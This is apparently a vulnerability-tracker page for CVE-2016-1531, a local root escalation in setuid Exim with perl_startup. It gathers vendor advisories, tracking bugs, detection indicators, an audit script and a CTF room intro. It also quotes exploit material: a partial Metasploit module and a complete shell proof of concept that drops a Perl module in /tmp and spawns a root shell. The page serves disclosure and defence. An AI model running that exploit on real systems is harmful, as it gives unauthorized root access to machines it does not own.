CVE-2016-1531
Published 2016-04-07
CVE-2016-1531: Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Priority: high (CVSS 3.0 score 7.0)
CVSS 3.0 vector: AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 5.90% (92.3rd percentile)
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | exim4 | < exim4 4.86.2-1 (bookworm) | exim4 4.86.2-1 (bookworm) |
| exim | exim | <= 4.86 | — |
Detection & IOCs (extracted from sources)
- Alert on creation of /tmp/root.pm, which is the malicious Perl module dropped by the shell-script PoC exploit for CVE-2016-1531.
- Monitor for the PERL5DB environment variable being set on exim process invocations, particularly containing 'exec' — this is the Metasploit technique for arbitrary command execution.
- Check whether the Exim binary is setuid root and compiled with Perl support; both conditions are required for exploitation.
- Verify the Exim configuration for the presence of the 'perl_startup' directive; exploitation requires this option to be set in /etc/exim/exim.conf or /etc/exim4/exim.conf.
- Audit Exim Perl support at runtime using 'exim -bV -v | grep -i Perl'; the presence of 'Perl' in the support flags indicates the binary is vulnerable if perl_startup is configured.
- Exploitation requires 'perl_startup' to be defined in the Exim main configuration file. Default configurations without this directive are NOT vulnerable.
- The file referenced by perl_startup does not need to exist on disk for the vulnerability to be exploitable — only the path must be specified in the config.
- The Ubuntu fix introduces full execution environment cleaning on Exim startup (including subprocesses/transports). This may break existing installations; use the new 'keep_environment' and 'add_environment' config options to adjust.
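The three preconditions in the notes above (setuid-root binary, Perl compiled in, perl_startup set) can be checked from a single audit script. The following is an added example written for this page, not code from any of the advisories or exploits it lists; the function names and the "exposed"/"not-exposed"/"missing" result strings are this example's own convention.

```shell
#!/bin/sh
# Added audit helper (not from the advisory or any source quoted above).
# It checks the three conditions the detection notes list for CVE-2016-1531:
#   1. the exim binary is setuid root,
#   2. Perl support is compiled in (listed in `exim -bV` output),
#   3. perl_startup is set in the main configuration.
# Only when all three hold does the perl_startup issue apply.

# is_setuid_root FILE -> exit 0 when FILE is owned by root and has the setuid bit
is_setuid_root() {
    [ -n "$(find "$1" -maxdepth 0 -user root -perm -4000 2>/dev/null)" ]
}

# perl_supported VERSION_TEXT -> exit 0 when the "Support for:" line of
# `exim -bV` output (passed in as text) lists Perl
perl_supported() {
    printf '%s\n' "$1" |
        grep -Eiq '^support for:.*[[:space:]]perl([[:space:]]|$)'
}

# config_sets_perl_startup CONFIG -> exit 0 when an uncommented
# perl_startup directive is present (a commented-out one does not count)
config_sets_perl_startup() {
    grep -Eq '^[[:space:]]*perl_startup[[:space:]]*=' "$1"
}

# audit_exim BINARY CONFIG -> prints one of:
#   exposed      all three conditions hold (returns 1)
#   not-exposed  at least one condition is missing (returns 0)
#   missing      binary or config file not found (returns 2)
audit_exim() {
    bin=$1; conf=$2
    [ -f "$bin" ] && [ -f "$conf" ] || { echo missing; return 2; }
    if is_setuid_root "$bin" &&
       perl_supported "$("$bin" -bV 2>/dev/null)" &&
       config_sets_perl_startup "$conf"; then
        echo exposed; return 1
    fi
    echo not-exposed; return 0
}

# Typical invocation on a Debian/Ubuntu host (paths from the detection notes):
#   audit_exim /usr/sbin/exim4 /etc/exim4/exim.conf
```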
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.0 | HIGH | CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 6.9 | MEDIUM | AV:L/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 7.0 | HIGH | — |
| vendor_debian | — | 7.0 | HIGH | — |
| vendor_redhat | — | 7.0 | HIGH | — |
| vendor_ubuntu | — | 4.6 | MEDIUM | — |
GHSA
GHSA-qqgw-xrxj-r5fc: Exim before 4
ghsa_unreviewed·2022-05-17
CVE-2016-1531 [HIGH] GHSA-qqgw-xrxj-r5fc: Exim before 4
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
OSV
CVE-2016-1531: Exim before 4
osv·2016-04-07·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531: Exim before 4
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
OSV
exim4 vulnerabilities
osv·2016-03-15·CVSS 4.6
[MEDIUM] exim4 vulnerabilities
exim4 vulnerabilities
It was discovered that Exim incorrectly filtered environment variables when
used with the perl_startup configuration option. If the perl_startup option
was enabled, a local attacker could use this issue to escalate their
privileges to the root user. This issue has been fixed by having Exim clean
the complete execution environment by default on startup, including any
subprocesses such as transports that call other programs. This change in
behaviour may break existing installations and can be adjusted by using two
new configuration options, keep_environment and add_environment.
(CVE-2016-1531)
Patrick William discovered that Exim incorrectly expanded mathematical
comparisons twice. A local attacker could possibly use this issue to
perform arbitrary file operations as
Ubuntu
Exim vulnerabilities
vendor_ubuntu·2016-03-15·CVSS 4.6
CVE-2014-2972 [MEDIUM] Exim vulnerabilities
Title: Exim vulnerabilities
Summary: Several security issues were fixed in Exim.
Red Hat
exim: local root privilege escalation for configurations with perl_startup
vendor_redhat·2016-03-02·CVSS 7.0
CVE-2016-1531 [HIGH] CWE-426 exim: local root privilege escalation for configurations with perl_startup
exim: local root privilege escalation for configurations with perl_startup
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Statement: This issue affects the version of exim as shipped with Red Hat Enterprise Linux 4 and 5. However, the default configurations are not affected, as they do not use 'perl_startup' directive.
Red Hat Enterprise Linux 4 is now in Extended Life Cycle phase of the support and maintenance life cycle, and Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/
Debian
CVE-2016-1531: exim4 - Exim before 4.86.2, when installed setuid root, allows local users to gain privi...
vendor_debian·2016·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531: exim4 - Exim before 4.86.2, when installed setuid root, allows local users to gain privi...
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
Scope: local
bookworm: resolved (fixed in 4.86.2-1)
bullseye: resolved (fixed in 4.86.2-1)
forky: resolved (fixed in 4.86.2-1)
sid: resolved (fixed in 4.86.2-1)
trixie: resolved (fixed in 4.86.2-1)
No detection rules found.
Exploit-DB
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
exploitdb·2016-04-15·CVSS 7.0
CVE-2016-1531 [HIGH] Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Exim "perl_startup" Privilege Escalation',
'Description' => %q{
This module exploits a Perl injection vulnerability in Exim [
'Dawid Golunski', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-1531},
%w{EDB 39549},
%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
],
'DisclosureDate' => 'Mar 10 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'BadChars' => "\x22\x27", # " and '
'Compat' => {
'PayloadType' => 'cmd cmd_ba
```
Exploit-DB
Exim < 4.86.2 - Local Privilege Escalation
exploitdb·2016-03-10
CVE-2016-1531 Exim < 4.86.2 - Local Privilege Escalation
Exim exim
```
[dawid@centos7 ~]$ ls -l /usr/sbin/exim
-rwsr-xr-x. 1 root root 1222416 Dec 7 2015 /usr/sbin/exim
```
Normally, when the exim sendmail interface starts up, it drops its root
privileges before giving control to the user (i.e. entering mail contents for
sending etc.); however, an attacker can make use of the following command line
parameter, which is available to all users:
```
-ps This option applies when an embedded Perl interpreter is linked with
    Exim. It overrides the setting of the perl_at_start option, forcing the
    starting of the interpreter to occur as soon as Exim is started.
```
As we can see from the documentation at:
http://www.exim.org/exim-html-current/doc/html/spec_html/ch-embedded_perl.html
the perl_at_start option does the following:
"Setting perl_at_start (a boolean option) i
Exploit-DB
Exim 4.84-3 - Local Privilege Escalation
exploitdb·2016-03-09·CVSS 7.0
CVE-2016-1531 [HIGH] Exim 4.84-3 - Local Privilege Escalation
Exim 4.84-3 - Local Privilege Escalation
---
```sh
#!/bin/sh
# CVE-2016-1531 exim
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
```
Bugzilla
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [epel-all]
bugzilla·2016-03-03·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [epel-all]
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects
Bugzilla
CVE-2016-1531 exim: local root privilege escalation for configurations with perl_startup
bugzilla·2016-03-03·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531 exim: local root privilege escalation for configurations with perl_startup
CVE-2016-1531 exim: local root privilege escalation for configurations with perl_startup
Privilege escalation vulnerability was found in all installations having Exim set-uid root and using 'perl_startup'. Any user who can start an instance of Exim can gain root privileges.
https://lists.exim.org/lurker/message/20160302.191005.a72d8433.en.html
Discussion:
Created exim tracking bugs for this issue:
Affects: fedora-all [bug 1314294]
Affects: epel-all [bug 1314295]
---
Related upstream commits:
http://git.exim.org/exim.git/commitdiff/43ba2742c700d625dcdcdaf7bbadc2f72776854a
http://git.exim.org/exim.git/commitdiff/677c582e4da6b30f5467964bbd105c111247df25
http://git.exim.org/exim.git/commitdiff/dd90c19962a63fe966e17c75b4a36639302d1e67
External Reference:
http://exim.org/static/doc/CVE
Bugzilla
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [fedora-all]
bugzilla·2016-03-03·CVSS 7.0
CVE-2016-1531 [HIGH] CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [fedora-all]
CVE-2016-1531 exim: Local privilege escalation for set-uid root exim when using perl_startup [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects mul
CTF
LinuxPrivEsc / README
ctf_writeups
LinuxPrivEsc / README
Task 1: Deploy the Vulnerable Debian VM
This room is aimed at walking you through a variety of Linux Privilege Escalation techniques. To do this, you must first deploy an intentionally vulnerable Debian VM. This VM was created by Sagi Shahar as part of his local privilege escalation workshop but has been updated by Tib3rius as part of his Linux Privilege Escalation for OSCP and Beyond! course on Udemy. Full explanations of the various techniques used in this room are available there, along with demos and tips for finding privilege escalations in Linux.
Make sure you are connected to the TryHackMe VPN or using the in-browser Kali instance before trying to access the Debian VM!
SSH should be available on port 22. You can login to the "user" account using the following command:
ssh use
References
- http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00026.html
- http://packetstormsecurity.com/files/136124/Exim-4.84-3-Local-Root-Privilege-Escalation.html
- http://www.debian.org/security/2016/dsa-3517
- http://www.exim.org/static/doc/CVE-2016-1531.txt
- http://www.rapid7.com/db/modules/exploit/unix/local/exim_perl_startup
- http://www.securitytracker.com/id/1035512
- http://www.ubuntu.com/usn/USN-2933-1
- https://www.exploit-db.com/exploits/39535/
- https://www.exploit-db.com/exploits/39549/
- https://www.exploit-db.com/exploits/39702/